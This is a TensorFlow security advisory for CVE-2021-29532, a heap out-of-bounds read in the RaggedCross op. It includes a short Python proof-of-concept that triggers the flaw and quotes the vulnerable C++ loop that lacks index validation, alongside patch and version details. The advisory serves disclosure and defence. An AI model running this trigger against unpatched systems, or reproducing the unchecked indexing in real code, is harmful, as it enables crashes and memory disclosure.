1## TFSA-2021-021: Heap out of bounds read in `RaggedCross` 2 3### CVE Number 4CVE-2021-29532 5 6### Impact 7An attacker can force accesses outside the bounds of heap allocated arrays by 8passing in invalid tensor values to `tf.raw_ops.RaggedCross`: 9 10```python 11import tensorflow as tf 12 13ragged_values = [] 14ragged_row_splits = [] 15sparse_indices = [] 16sparse_values = [] 17sparse_shape = [] 18 19dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64) 20dense_inputs = [dense_inputs_elem] 21 22input_order = "R" 23hashed_output = False 24num_buckets = 0 25hash_key = 0 26 27tf.raw_ops.RaggedCross(ragged_values=ragged_values, 28 ragged_row_splits=ragged_row_splits, 29 sparse_indices=sparse_indices, 30 sparse_values=sparse_values, 31 sparse_shape=sparse_shape, 32 dense_inputs=dense_inputs, 33 input_order=input_order, 34 hashed_output=hashed_output, 35 num_buckets=num_buckets, 36 hash_key=hash_key, 37 out_values_type=tf.int64, 38 out_row_splits_type=tf.int64) 39``` 40 41This is because the 42[implementation](https://github.com/tensorflow/tensorflow/blob/efea03b38fb8d3b81762237dc85e579cc5fc6e87/tensorflow/core/kernels/ragged_cross_op.cc#L456-L487) 43lacks validation for the user supplied arguments: 44 45```cc 46int next_ragged = 0; 47int next_sparse = 0; 48int next_dense = 0; 49for (char c : input_order_) { 50 if (c == 'R') { 51 TF_RETURN_IF_ERROR(BuildRaggedFeatureReader( 52 ragged_values_list[next_ragged], ragged_splits_list[next_ragged], 53 features)); 54 next_ragged++; 55 } else if (c == 'S') { 56 TF_RETURN_IF_ERROR(BuildSparseFeatureReader( 57 sparse_indices_list[next_sparse], sparse_values_list[next_sparse], 58 batch_size, features)); 59 next_sparse++; 60 } else if (c == 'D') { 61 TF_RETURN_IF_ERROR( 62 BuildDenseFeatureReader(dense_list[next_dense++], features)); 63 } 64 ... 65} 66``` 67 68Each of the above branches call a helper function after accessing array elements 69via a `*_list[next_*]` pattern, followed by incrementing the `next_*` index. 70However, as there is no validation that the `next_*` values are in the valid 71range for the corresponding `*_list` arrays, this results in heap OOB reads. 72 73### Patches 74We have patched the issue in GitHub commit 75[44b7f486c0143f68b56c34e2d01e146ee445134a](https://github.com/tensorflow/tensorflow/commit/44b7f486c0143f68b56c34e2d01e146ee445134a). 76 77The fix will be included in TensorFlow 2.5.0. We will also cherrypick this 78commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 792.1.4, as these are also affected and still in supported range. 80 81### For more information 82Please consult [our security 83guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for 84more information regarding the security model and how to contact us with issues 85and questions. 86 87### Attribution 88This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team. 89